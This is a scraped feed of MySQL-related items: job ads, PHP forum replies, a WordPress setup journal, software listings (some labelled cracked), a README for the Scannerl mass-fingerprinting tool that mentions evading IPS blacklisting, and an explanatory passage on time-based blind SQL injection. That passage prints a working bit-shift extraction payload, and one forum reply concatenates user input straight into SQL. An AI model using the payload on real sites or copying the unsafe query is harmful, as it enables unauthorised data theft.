
          Percona Live 2012 – The Etsy Shard Architecture      Cache   Translate Page      
I attended Percona Conf in Santa Clara last week. It was a great 3 days of lots of people dropping expert MySQL knowledge. I learned a lot and met some great people. I gave a talk about the Etsy shard architecture, and had a lot of good feedback and questions. A lot of people do […]
          Distributed MySQL Sleuthing on the Wire      Cache   Translate Page      
Intro: Oftentimes you need to know what MySQL is doing right now, and if you are handling heavy traffic you probably have multiple instances of it running across many nodes. I’m going to start by showing how to take a tcpdump capture on one node, a few ways to analyze that, and then go […]
          WHMCS Module Development - 2      Cache   Translate Page      
We are looking for a WHMCS Module developer to drive forward future versions of our WHMCS module. This work is regular; we aim to release new versions every three months, and the successful person will have the option to complete all of the future work on the module... (Budget: £5 - £10 GBP, Jobs: HTML, Linux, MySQL, PHP, WHMCS)
          Online digital ebook library      Cache   Translate Page      
I have some manuals I would like to upload to my web server as PDFs and allow users to read them online. (Budget: $30 - $250 USD, Jobs: CMS, CSS, HTML, MySQL, PHP)
          Web development + desktop development      Cache   Translate Page      
A system for calling/paging people needs to be developed in Java. Pre-established patterns and structures must be used. MySQL and Tomcat will be used. The solution must be documented and ... (Budget: $10 - $30 USD, Jobs: Java, MySQL, PHP, Software Architecture, Website Management)
          Web development      Cache   Translate Page      
I need my website re-configured. I have some sites built with Ruby. Need help with updates. (Budget: $750 - $1500 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          Query and validate before inserting array data into the database      Cache   Translate Page      

Query and validate before inserting array data into the database

Reply to Query and validate before inserting array data into the database

// get the id of the next tag
$result = mysqli_query($conexion, "SHOW TABLE STATUS WHERE `Name` = 'tags'");
$data = mysqli_fetch_assoc($result);
$Proximo_id = $data['Auto_increment'];

With this you can find out which id comes next in your tags table. I use it to get the next id of my posts table so that, once a post is created, I can redirect to it...
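For reference, the same value can also be read straight from information_schema (a sketch of an equivalent query, not from the original reply; note that with InnoDB the reported AUTO_INCREMENT is only an estimate and can change under concurrent inserts):

SELECT AUTO_INCREMENT FROM information_schema.TABLES WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 'tags';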

Published on November 6, 2018 by Yoangel Eizaga

          Automatic inserts for clients      Cache   Translate Page      

Automatic inserts for clients

Reply to Automatic inserts for clients

Hi. Thanks for replying.

The payment amount is in a separate table called servicios; those would be added manually, afterwards.

Yes, it is the MySQL variant.

The number of clients keeps growing over time.
Right now there are 1000, later 1001, 1002...

I don't know if I'm explaining myself well; I'm really bad at explaining, heh.


I have 4 clients (for now; the number will keep growing). Pedro comes in and pays, and his payment for the month of January is recorded. (Payment is due on the 1st of ...

Published on November 6, 2018 by alejandro

          Parameters in PHP 7      Cache   Translate Page      

Parameters in PHP 7

Reply to Parameters in PHP 7

I switched it to mysqli and it still shows an error.

Published on November 6, 2018 by elsy

          Telecommute WordPress Support Superhero      Cache   Translate Page      
A web design company is filling a position for a Telecommute WordPress Support Superhero. Core responsibilities of this position include: supporting our awesome members and customers; assisting with and solving all manner of WordPress questions, with style; coordinating with developers over bugs, features and cool new stuff. Required skills: a really good familiarity with WordPress; keen on working in an expanding, motivated, distributed support team; love of impressive response times, typing speed and the ability to really bang good stuff out; ability to code (PHP/MySQL and/or HTML/CSS) a bit, or a lot, even better
          Telecommute Front End Software Engineer      Cache   Translate Page      
A staffing company is searching for a person to fill their position for a Telecommute Front End Software Engineer. The individual must be able to fulfill the following responsibilities: using front-end development technology; willingness to embrace the concept of iterative development; embracing the concept of iterative development. Qualifications include: 2+ years of experience in writing unit tests; 1+ years of experience working in an environment where CI/CD tools are used; 2+ years of experience as a hands-on software engineer; at least 1 year of working experience using cloud services such as AWS; Bachelor's Degree in Computer Science, Electrical Engineering, or Computer Engineering; database knowledge in technology such as SQL Server / Oracle / MySQL / MongoDB / Cassandra, etc.
          Telecommute Database Engineer      Cache   Translate Page      
A staffing agency has a current position open for a Telecommute Database Engineer. The individual must be able to fulfill the following responsibilities: working with teams to resolve production issues, troubleshooting symptoms and more; evaluating all monitoring alerts and differentiating between valid and false-positive alerts; following documented processes for troubleshooting, recovery, and service restoration. Required skills: Bachelor’s Degree in Computer Science, Electrical Engineering, or Computer Engineering; 2+ years of experience as a hands-on database developer/administrator; 1+ years of practical work experience using cloud services such as AWS; exposure to at least one of the following databases: Oracle / MSSQL / MySQL; good knowledge of monitoring and tuning databases to provide a high-availability service; good knowledge of database backup and recovery, export/import, tools and techniques
          App-MysqlUtils-0.012 : Perlancar      Cache   Translate Page      
Perlancar uploaded P/PE/PERLANCAR/App-MysqlUtils-0.012.tar.gz (27k) on 06 Nov 2018
          PHP Screen scraping, save to MYSQL DB      Cache   Translate Page      
PHP Screen scraping, save to MYSQL DB, will need to work closely with me. (Budget: $30 - $250 USD, Jobs: MySQL, PHP)
          Connect to and manage SSH and MySQL servers with Guake Indicator      Cache   Translate Page      
Connect to and manage SSH and MySQL servers with Guake Indicator

If you constantly need to connect to SSH and MySQL servers, install and use Guake Indicator on your Ubuntu system.

Read the rest of the article "Conecte e gerencie servidores SSH e MySQL com o Guake Indicator"

The post "Conecte e gerencie servidores SSH e MySQL com o Guake Indicator" (Connect to and manage SSH and MySQL servers with Guake Indicator) appeared first on Blog do Edivaldo.


          Reply To: Search form for entries      Cache   Translate Page      

Thank you Marcel. I’m just a good copypaster 😀 but I know I should try to follow your suggestion.
In the meantime, I’ve changed the search query, using MySQL’s full-text search.
So I added a fulltext index to the guestbook entries table and used this query:

SELECT id, author_id, author_name, content FROM wp_gwolle_gb_entries WHERE MATCH (author_name, content) AGAINST ('".$str."*' IN BOOLEAN MODE)
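For reference, the FULLTEXT index that this query relies on can be created with something along these lines (a sketch based on the table and columns used above; the index name is arbitrary):

ALTER TABLE wp_gwolle_gb_entries ADD FULLTEXT ft_author_content (author_name, content);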

This made my day. And in fact it’s midnight here 😀


          Free Online Database Diagram Maker with Sharing, Export as SQL, PDF      Cache   Translate Page      

This article covers a free online database diagram maker tool. With this tool, you can quickly make SQL database diagrams and export as MySQL, PNG & PDF.

The post Free Online Database Diagram Maker with Sharing, Export as SQL, PDF appeared first on I Love Free Software.


          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Functional Tester (Home-based)      Cache   Translate Page      
Functional Testers with 2-4 years of related experience. Task and Responsibilities 1. Develop Test Cases and Test Scripts 2. Execute Test Cases 3. Analyze test results and report defects 4. Interact and Collaborate with Development Team 5. Send Test Progress report to Test Lead Technical Skills 1. Functional Testing 2. System Integration Testing 3. Regression Testing 4. Test Case Analysis 5. Familiar with MySQL, PHP, JIRA, Payment Systems, Scheduling Systems 6. Web Application testing is required 7. Mobile testing is a plus
          Solutions Architect/Senior Developer      Cache   Translate Page      
Job Description Solutions Architect/Senior Developer to work on bespoke customer specific development projects based on market leading technologies within a busy custom solutions development team. Building key relationships with SI Practice, Professional Services and Sales teams internally, as well as our valued customers externally. Main Responsibilities Undertake development projects requiring the use of market leading technologies: HTML, Javascript, various leading frameworks, ASP.NET, C#, Styling Languages, Developer tools Undertake the installation, configuration and development requirements of web development projects dependant on demand and skills Effective and regular communication with clients and management Work on client sites, Advanced offices and home Gathering requirements and writing proposals User and system documentation Project management Qualifications • Bachelor Degree in Computing or related subject or relevant commercial experience • IT qualifications (advantageous) • Strong communication skills, written and spoken • Well-presented and good interpersonal skills Experience Essential • Web development - HTML, HTML5, Javascript, AJAX, CSS etc. • At least 5 years .NET/C# development inc Visual Studio • Microsoft SQL Server and related market leading technologies • Relevant experience in a similar role Preferred • Microsoft Sharepoint • SQL Server - SSIS, SSRS Relevant • Mobile development - Xamarin, OSX, iOS, Android, Mobile Frameworks Phonegap, JQuery Mobile • IDEs - Eclipse, XCode • Databases - Oracle, MySQL, PostgreSQL • Application Servers - JBOSS, Tomcat, IIS • XML – XML schema, XQuery, XSLT, XPath • Build - SVN, CVS, Mercurial, ANT, GitHub, Competencies • ‘Can-do’ pro-active attitude • Attention to detail – focus on quality • Able to analyse business requirements effectively • Creativity and Innovation in designing solutions • Teamwork – able to work effectively as part of a team or independently • Coaching – self-development. Willing and able to learn new skills • Drive for Achievement – keen to progress • Initiative - project ownership • Resilience • Customer Service Orientation Join the Team Some of our Key Benefits are: Excellent benefits from day one: 25 days holidays + opportunity to buy or sell up to 5 days contributory pension life insurance income protection insurance childcare voucher salary sacrifice cycle to work schem, employee assistance programme Special focus on training and development with the opportunity to excel your career from our internal Talent Development Team Be part of an organisation that has recently been ranked by Deloitte in the Top 50 fastest growing Tech Companies Advanced are an equal opportunity employer, committed to removing bias from the hiring process. We hire for potential and develop at pace. If successful, you can expect to take an online assessment, meet the HR team and attend a final interview. Click apply now, and a member of our in-house talent acquisition team will be in touch!
          How can I add mysqli result set to another array      Cache   Translate Page      

@programmer wrote:

I'm trying to put a mysqli result set into an array for later use, and this is how I did it (but it's not working):

$split = [];
$sql_money = "SELECT j_id, amount_invested FROM j_members WHERE j_activated = 1 LIMIT 5";
$result_money = mysqli_query($conn, $sql_money);
while ($data = mysqli_fetch_assoc($result_money)) {
    $split[] = ['id' => $data['j_id'], 'invest' => $data['amount_invested']];
    //echo $data['j_id'];
}

foreach ($split as $s) {
    echo $s['id'] . '<br>';
}

Who can put me through

Posts: 4

Participants: 4

Read full topic


          Need load balance paypal button      Cache   Translate Page      
Need a PayPal button that says "Load Balance" and an input for how much the user wants to load their balance with; when it is clicked, the user will log in to PayPal and complete the transaction... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          small Java program -- 2      Cache   Translate Page      
I have a simple Java program that reads data from a local database (SQL) and prints the columns of a certain table. I want to upgrade that program to make it print that information to PDF and HTML files using Pandoc... (Budget: $10 - $30 USD, Jobs: Java, Javascript, MySQL, PHP, Software Architecture)
          eCommerce webpage to sell digital download data extracted from a MySql database      Cache   Translate Page      
I have a MySQL database whose data is keyed by postcode (primary key). I would like to allow users to search that database (from a front-end webpage) by postcode and display the total number of records (just a summary count of the records)..... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
           [MySQL][PHP] Listing posts in a custom order       Cache   Translate Page      
none
          Needed Web Scraping Developer      Cache   Translate Page      
This is a long-term, ongoing project with no deadline and no budget limit, starting immediately. My company has around 400 student records that need to be enrolled in different universities... (Budget: $250 - $750 USD, Jobs: Database Programming, Java, MySQL, Software Architecture, Web Scraping)
          Matomo v3.6.1 – Web analytics script      Cache   Translate Page      
Matomo is an open-source web analytics system created by web developers from around the world. Matomo is installed on a web server and runs on PHP/MySQL. Today Matomo is used on more than 1,000,000 sites. Matomo aims to become a fully fledged free, open and independent alternative to Google Analytics worldwide and, in particular, to Yandex.Metrica in Russia.
          Tip: Know if LIKE Results are True or False      Cache   Translate Page      
See if LIKE results are true or false in MySQL.
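For example, a minimal illustration of the tip (in MySQL a LIKE comparison simply evaluates to 1 for true and 0 for false):

SELECT 'database' LIKE 'data%';  -- returns 1 (true)
SELECT 'database' LIKE 'word%';  -- returns 0 (false)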
          PHP CodeIgniter Expert Required -- 3      Cache   Translate Page      
*** BID WITH YOUR ACTUAL BUDGET & TIME ELSE I WILL REPORT YOU************ I already have a system developed & you need to make the following changes in it: 1. Users with different privileges & roles... (Budget: $30 - $250 AUD, Jobs: Codeigniter, MySQL, PHP, Software Architecture, Website Management)
          Azure SQL Database and Azure Database for MySQL at PASS SUMMIT!      Cache   Translate Page      
Get inspired by our industry-leading keynote speakers on the Microsoft data platform at PASS Summit 2018! There has never been a more exciting time for data professionals and developers as more organizations turn to data-driven insights to stay ahead and prepare for the future.
          Best practices for alerting on metrics with Azure Database for MySQL monitoring      Cache   Translate Page      
Whether you are a developer, database administrator, site reliability engineer, or a DevOps professional at your company, monitoring databases is an important part of maintaining the reliability, availability, and performance of your MySQL server.
          Comment on Contact by Audry Francillon      Cache   Translate Page      
Last month, when I visited your blog I got an error from your MySQL server.
          Journal, ISO week 2018-W44      Cache   Translate Page      

last week

Gaming time

Over a month ago I decided to make some changes that were intended to reduce the amount of time I waste on time-demanding (and perhaps not so enjoyable) games. This week I took a few minutes to see how I've been getting on.

The time I spent playing games (I think this is all time-sucking games with a few minutes here and there - I haven't played a "proper" computer game in ages) over the last few months:

July: 11 hours, 46 minutes
August: 13 hours, 18 minutes
September: 9 hours, 10 minutes (changes made towards the end)
October: 4 hours, 49 minutes

So it's gone down, by quite a lot. But I still spent nearly 5 hours chasing time limited bonuses, taking part in time limited contests and recharging/rebuilding some numbers in a database!

I want to get back to gaming that builds reactions and skills (yes, they might only be skills at a game but it's better than repeated drudgery where you inevitably do better because you've upgraded things - a few minutes here and there really not being enough to build a skill anyway). Or maybe even gaming with other real people who you can speak to afterwards!

Exhausting meetings

Another week with a lot of time spent in phone and physical meetings. These seem to take so much energy, especially the physical meetings - I'm always exhausted by the time I get back. The meetings were mostly for consultancy clients this week and they've come with a lot of required background thinking and planning, which probably hasn't helped my feeling of tiredness. Unfortunately it also means there's going to be a lot of writing in next week's schedule.

php (WordPress) development environment

I don't do much in PHP but this week I've ended up building two development/testing environments for WordPress related things.

One was just for a one-time test to work out how (if) a data migration from Magento to Woocommerce would work. For this I used the super simple Scotch Box which provided all the basics. Then I copied over a couple of databases (with mysqldump, etc) and copied the website files - that was it, a working and easily disposable testing environment. The Magento to Woocommerce migration seemed to work quite well too!

The second environment was for actual, and ongoing, development. My PaTMa blog is using WordPress and I'm working on a custom theme so that I can make it more consistent with the application site. Then my intention is to also use WordPress for the marketing site for PaTMa, leaving just the actual application as a Django-based bespoke site. I've previously played with the Vagrant approach for this too, but it felt a bit heavier/slower than I wanted. Thankfully it didn't take long to find (be reminded of, really) PHP's built-in web server, work out a few PHP dependencies (I already have MySQL installed on my main dev machine) and make use of the excellent WP-CLI to make an empty WordPress site all ready for some theme development.

In case it's useful to anyone, here's what I actually did:

sudo apt install php7.2-cli php-mysql
curl https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar -o wp
chmod +x wp
mkdir test-wp
cd test-wp
../wp core download
../wp core config --dbname=test_wp --dbuser=root --dbpass=root --dbhost=localhost
../wp db create
../wp core install --url=http://localhost:8000 --title=Test --admin_user=admin --admin_password=password --admin_email=admin@example.com
php -S localhost:8000

Then point a browser at http://localhost:8000/ to see a basic, default WordPress site.

One final step for me was linking my development theme into this new WordPress install:

cd wp-content/themes
ln -s ../../../my-theme

I then logged in as admin and activated my development theme, all ready for work.

Bricks and Blocks

Saturday included a visit to a Bricks and Blocks event that the local scout group ran. I was quite surprised by how large the event was; there were a lot of great things on display including an infinite (ie circular) ball-run made entirely from Lego and a Robot Wars stall. The Robot Wars display included several full size robots, including one being demo'd; plus a mini arena with mini robots for the "children" to try out. The range of Lego was also impressive with all sorts from town to Star Wars to the new Harry Potter. Even the ancient Fabuland had a stall, much to the delight of our youngest (who's a fan of some Fabuland books I still have).

Uneventful budget

Having set aside my Monday afternoon to watch the budget - so I could react quickly and get any changes required for the buy-to-let profit calculations - I was quite pleased it was pretty boring, especially on the landlord and property front.

Property

I had a great chat with Susannah Cole from The Good Property Company - some fantastic insights.


          Is it possible to bundle/ship PHP+MySQL in standalone executable?      Cache   Translate Page      

I am trying to create an application that has a sender and receiver. The entire application is only meant to be used on a LAN and can also possibly be done almost completely through the browser.

The "sender" part is an application of some sort that will need to run a local server on the person's computer and allow for php,html,css,js, and mysql to run.

On the "receiver" end, it is simply a person's browser accessing a webpage being served up from the "sender" application.

I have been looking into Node.js as a means of accomplishing the server part of this... but I am not sure if I can ship it as an exe with MySQL and PHP installed and allow it to be exec'd from PHP. I am aware of being able to install these extensions using npm, but I want to ship a whole exe to the end user and not have them install Node on their own.

Is this possible? If so, how? Thanks in advance.


          #8: Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5      Cache   Translate Page      
Learning PHP, MySQL & JavaScript
Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5
Robin Nixon

Buy new: CDN$ 64.65 CDN$ 45.81
50 used & new from CDN$ 45.61

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with CodeIgniter framework. The candidate must be able to communicate in English over Skype... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Virtual coin Bustabit      Cache   Translate Page      
I am looking for someone to build a Korean-style bustabit game. It uses virtual money (or points) to bet, not Bitcoin. It must be developed on this environment: 1. PHP (higher than 7.x) + Javascript + HTML + CSS client (for PC and mobile) 2... (Budget: $750 - $1500 USD, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with CodeIgniter framework. The candidate must be able to communicate in English Looking for a dedicated and motivated individual... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Are queries made on a shared host done per account or across all accounts?      Cache   Translate Page      
I just wondered if anyone knows of a site that can give me more information on the way MySQL actually processes the queries made from any account on the server. What I want to know is: if a server has multiple sites, are the queries processed in strict order for each account or across all...
          SQLPro for Postgres 1.0.302 for Mac (cracked) – PostgreSQL database management client      Cache   Translate Page      
SQLPro for Postgres is an excellent database client for Mac. It supports mainstream databases such as Postgres, MySQL, Microsoft SQL Server and Oracle, and makes database management convenient and easy. Very nice!
          Navicat for MySQL 12.0.28 for Mac (cracked) – database management and development tool      Cache   Translate Page      
Navicat for MySQL for Mac is a professional database management and development tool for the Mac platform. The cracked Navicat for MySQL for Mac supports creating data models, importing/exporting data, backups, transferring databases and more, and also provides a full-featured graphical manager.
          SQLPro for MySQL 1.0.302 (cracked) – an excellent MySQL client      Cache   Translate Page      
SQLPro for MySQL is an excellent MySQL client for Mac that connects to MySQL databases quickly and conveniently, with a graphical interface, multiple themes, code highlighting, query statements and more!
          Junior/Mid-level Programmer – salary expectations – downtown Rio de Janeiro – 4 openings      Cache   Translate Page      
Position: JUNIOR AND MID-LEVEL PROGRAMMER. Contract type: CLT – permanent. Number of openings: 4. Job description / responsibilities: experience with Angular, .NET Core, C#, Web API, SQL Server, MySQL; ASP.NET, Visual Basic .NET, SQL Server. Required education and experience: Read more...
          Need a programmer/graphic designer (doesn't have to be a designer) for a FiveM server (VRP base); full time possible if desired      Cache   Translate Page      
I need a programmer who is also a graphic designer to fix some bugs and implement scripts and mods; VRP base, Brazilian host; must know how to work with a VRP base for FiveM. (Budget: $30 - $250 USD, Jobs: HTML5, Lua, MySQL, Scripting)
          Javaspring Backend and Frontend Development -- 2      Cache   Translate Page      
We are building a web application server that contains real-time MongoDB, local SQL, Java, Javaspring, and NodeJS. We would like to have a developer who has these skills and willing to work on As Needed... (Budget: $250 - $750 USD, Jobs: Angular.js, Java, MySQL, node.js, NoSQL Couch & Mongo)
          #10: Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5      Cache   Translate Page      
Learning PHP, MySQL & JavaScript
Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5
Robin Nixon

Buy new: CDN$ 64.65 CDN$ 45.81
50 used & new from CDN$ 45.61

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Portfolio In PDF & Email SMS Phase 2      Cache   Translate Page      
There are four pages which need to be designed/built: admin for Email SMS (over the Phase 1 already built); admin for Portfolio in PDF; front-end page of PDF; front-end page of Email SMS (over the Phase... (Budget: ₹12500 - ₹37500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Scannerl - The Modular Distributed Fingerprinting Engine      Cache   Translate Page      

Scannerl is a modular distributed fingerprinting engine implemented by Kudelski Security. Scannerl can fingerprint thousands of targets on a single host, but can just as easily be distributed across multiple hosts. Scannerl is to fingerprinting what zmap is to port scanning.
Scannerl works on Debian/Ubuntu/Arch (but will probably work on other distributions as well). It uses a master/slave architecture where the master node will distribute the work (host(s) to fingerprint) to its slaves (local or remote). The entire deployment is transparent to the user.

Why use Scannerl
When using conventional fingerprinting tools for large-scale analysis, security researchers will often hit two limitations: first, these tools are typically built for scanning comparatively few hosts at a time and are inappropriate for large ranges of IP addresses. Second, if a large range of IP addresses protected by IPS devices is being fingerprinted, the probability of being blacklisted is higher, which could lead to an incomplete set of information. Scannerl is designed to circumvent these limitations, not only by providing the ability to fingerprint multiple hosts simultaneously, but also by distributing the load across an arbitrary number of hosts. Scannerl also makes the distribution of these tasks completely transparent, which makes setup and maintenance of large-scale fingerprinting projects trivial; this allows you to focus on the analyses rather than the herculean task of managing and distributing fingerprinting processes by hand. In addition to the speed factor, scannerl has been designed to let you easily set up specific fingerprinting analyses in a few lines of code. Not only is a fingerprinting cluster easy to set up, it can also be tweaked by adding fine-tuned scans to your fingerprinting campaigns.
It is the fastest tool to perform large scale fingerprinting campaigns.
For more:

Installation
See the different installation options under wiki installation page
To install from source, first install Erlang (at least v.18) by choosing the right packaging for your platform: Erlang downloads
Install the required packages:
# on debian
$ sudo apt install erlang erlang-src rebar

# on arch
$ sudo pacman -S erlang-nox rebar
Then build scannerl:
$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh
Get the usage by running
$ ./scannerl -h
Scannerl is available on aur for arch linux users
DEBs (Ubuntu, Debian) are available in the releases.
RPMs (Opensuse, Centos, Redhat) are available under https://build.opensuse.org/package/show/home:chapeaurouge/scannerl.

Distributed setup
Two types of nodes are needed to perform a distributed scan:
  • Master node: this is where scannerl's binary is run
  • Slave node(s): this is where scannerl will connect to distribute all its work
The master node needs to have scannerl installed and compiled while the slave node(s) only needs Erlang to be installed. The entire setup is transparent and done automatically by the master node.
Requirements for a distributed scan:
  • All hosts have the same version of Erlang installed
  • All hosts are able to connect to each other using SSH public key
  • All hosts' names resolve (use /etc/hosts if no proper DNS is setup)
  • All hosts have the same Erlang security cookie
  • All hosts must allow connection to Erlang EPMD port (TCP/4369)
  • All hosts have the following range of ports opened: TCP/11100 to TCP/11100 + number-of-slaves

Usage
$ ./scannerl -h
  ____   ____    _    _   _ _   _ _____ ____  _
 / ___| / ___|  / \  | \ | | \ | | ____|  _ \| |
 \___ \| |     / _ \ |  \| |  \| |  _| | |_) | |
  ___) | |___ / ___ \| |\  | |\  | |___|  _ <| |___
 |____/ \____/_/   \_\_| \_|_| \_|_____|_| \_\_____|

USAGE
scannerl MODULE TARGETS [NODES] [OPTIONS]

MODULE:
-m <mod> --module <mod>
mod: the fingerprinting module to use.
arguments are separated with a colon.

TARGETS:
-f <target> --target <target>
target: a list of target separated by a comma.
-F <path> --target-file <path>
path: the path of the file containing one target per line.
-d <domain> --domain <domain>
domain: a list of domains separated by a comma.
-D <path> --domain-file <path>
path: the path of the file containing one domain per line.

NODES:
-s <node> --slave <node>
node: a list of node (hostnames not IPs) separated by a comma.
-S <path> --slave-file <path>
path: the path of the file containing one node per line.
a node can also be supplied with a multiplier (<node>*<nb>).

OPTIONS:
-o <mod> --output <mod> comma separated list of output module(s) to use.
-p <port> --port <port> the port to fingerprint.
-t <sec> --timeout <sec> the fingerprinting process timeout.
-T <sec> --stimeout <sec> slave connection timeout (default: 10).
-j <nb> --max-pkt <nb> max pkt to receive (int or "infinity").
-r <nb> --retry <nb> retry counter (default: 0).
-c <cidr> --prefix <cidr> sub-divide range with prefix > cidr (default: 24).
-M <port> --message <port> port to listen for message (default: 57005).
-P <nb> --process <nb> max simultaneous process per node (default: 28232).
-Q <nb> --queue <nb> max nb unprocessed results in queue (default: infinity).
-C <path> --config <path> read arguments from file, one per line.
-O <mode> --outmode <mode> 0: on Master, 1: on slave, >1: on broker (default: 0).
-v <val> --verbose <val> be verbose (0 <= int <= 255).
-K <opt> --socket <opt> comma separated socket option (key[:value]).
-l --list-modules list available fp/out modules.
-V --list-debug list available debug options.
-A --print-args Output the args record.
-X --priv-ports use only source port between 1 and 1024.
-N --nosafe keep going even if some slaves fail to start.
-w --www DNS will try for www.<domain>.
-b --progress show progress.
-x --dryrun dry run.
See the wiki for more.

Standalone usage
Scannerl can be used on the local host without any other host. However, it will still create a slave node on the same host it is run from. Therefore, the requirements described in Distributed setup must also be met.
A quick way to do this is to make sure your host is able to resolve itself with
grep -q "127.0.1.1\s*`hostname`" /etc/hosts || echo "127.0.1.1 `hostname`" | sudo tee -a /etc/hosts
and create an SSH key (if not yet present) and add it to the authorized_keys (you need an SSH server running):
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
The following example runs an HTTP banner grab against google.com from localhost
./scannerl -m httpbg -d google.com

Distributed usage
In order to perform a distributed scan, one needs to pre-set up the hosts that will be used by scannerl to distribute the work. See Distributed setup for more information.
Scannerl expects a list of slaves to use (provided by the -s or -S switches).
./scannerl -m httpbg -d google.com -s host1,host2,host3

List available modules
Scannerl will list the available modules (output modules as well as fingerprinting modules) with the -l switch:
$ ./scannerl -l

Fingerprinting modules available
================================

bacnet UDP/47808: Bacnet identification
chargen UDP/19: Chargen amplification factor identification
fox TCP/1911: FOX identification
httpbg TCP/80: HTTP Server header identification
- Arg1: [true|false] follow redirection [Default:false]
httpsbg SSL/443: HTTPS Server header identification
https_certif SSL/443: HTTPS certificate graber
imap_certif TCP/143: IMAP STARTTLS certificate graber
modbus TCP/502: Modbus identification
mqtt TCP/1883: MQTT identification
mqtts TCP/8883: MQTT over SSL identification
mysql_greeting TCP/3306: Mysql version identification
pop3_certif TCP/110: POP3 STARTTLS certificate graber
smtp_certif TCP/25: SMTP STARTTLS certificate graber
ssh_host_key TCP/22: SSH host key graber

Output modules available
========================

csv output to csv
- Arg1: [true|false] save everything [Default:true]
csvfile output to csv file
- Arg1: [true|false] save everything [Default:false]
- Arg2: File path
file output to file
- Arg1: File path
file_ip output to stdout (only ip)
- Arg1: File path
file_mini output to file (only ip and result)
- Arg1: File path
file_resultonly output to file (only result)
- Arg1: File path
stdout output to stdout
stdout_ip output to stdout (only IP)
stdout_mini output to stdout (only ip and result)

Modules arguments
Arguments can be provided to modules with a colon. For example for the file output module:
./scannerl -m httpbg -d google.com -o file:/tmp/result

Result format
The result returned by scannerl to the output modules has the following form:
{module, target, port, result}
Where
  • module: the module used (Erlang atom)
  • target: IP or hostname (string or IPv4 address)
  • port: the port (integer)
  • result: see below
The result part is of the form:
{{status, type},Value}
Where {status, type} is one of the following tuples:
  • {ok, result}: fingerprinting the target succeeded
  • {error, up}: fingerprinting didn't succeed but the target responded
  • {error, unknown}: fingerprinting failed
Value is the returned value - it is either an atom or a list of elements

Extending Scannerl
Scannerl has been designed and implemented with modularity in mind. It is easy to add new modules to it:
  • Fingerprinting module: to query a specific protocol or service. As an example, the fp_httpbg.erl module allows you to retrieve the server entry in the HTTP response.
  • Output module: to output to a specific database/filesystem or output the result in a specific format. For example, the out_file.erl and out_stdout.erl modules allow output to a file or to stdout, respectively (the default behavior if not specified).
To create new modules, simply follow the behavior (fp_module.erl for fingerprinting modules and out_behavior.erl for output module) and implement your modules.
New modules can either be added at compile time or dynamically as an external file.
See the wiki page for more.


Download Scannerl

          Efficient time-based blind SQL injection using MySQL bit functions and operators      Cache   Translate Page      
Between 2011 and 2012 I carried out a series of penetration tests against various PHP applications backed by MySQL databases. During that time I found that most of these databases were vulnerable to time-based blind SQL injection, but because of various restrictions they were not easy to exploit. So I started searching for answers online and stumbled upon an article about SQL injection using bit-shifting techniques. That blog post showed how to use the right-shift operator (>>) to enumerate the binary bits of a value returned by a SQL query.

Note: for a complete description of MySQL's bit functions and operators, see https://dev.mysql.com/doc/refman/5.7/en/bit-functions.html

The right-shift operator shifts the bits of a binary value to the right by the given number of positions, as shown below:

mysql> select ascii(b'01110010');
+--------------------+
| ascii(b'01110010') |
+--------------------+
|                114 |
+--------------------+
1 row in set (0.00 sec)

mysql> select ascii(b'01110010') >> 1;
+-------------------------+
| ascii(b'01110010') >> 1 |
+-------------------------+
|                      57 |
+-------------------------+
1 row in set (0.00 sec)

This can be used to enumerate the characters of a string during blind SQL injection. If the data falls within the full ASCII table, each character can be enumerated in at most 8 requests.

The data we want to extract here is the first character returned by the query select user().

Bit 1:

We first find the value of the first bit: ????????

There are two possibilities:

0 (decimal value: 0) // TRUE condition
or
1 (decimal value: 1) // FALSE condition

mysql> select if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false');
+--------------------------------------------------------------------------------------+
| if ((ascii((substr(user(),1,1))) >> 7 )=0,benchmark(10000000,sha1('test')), 'false') |
+--------------------------------------------------------------------------------------+
| 0                                                                                    |
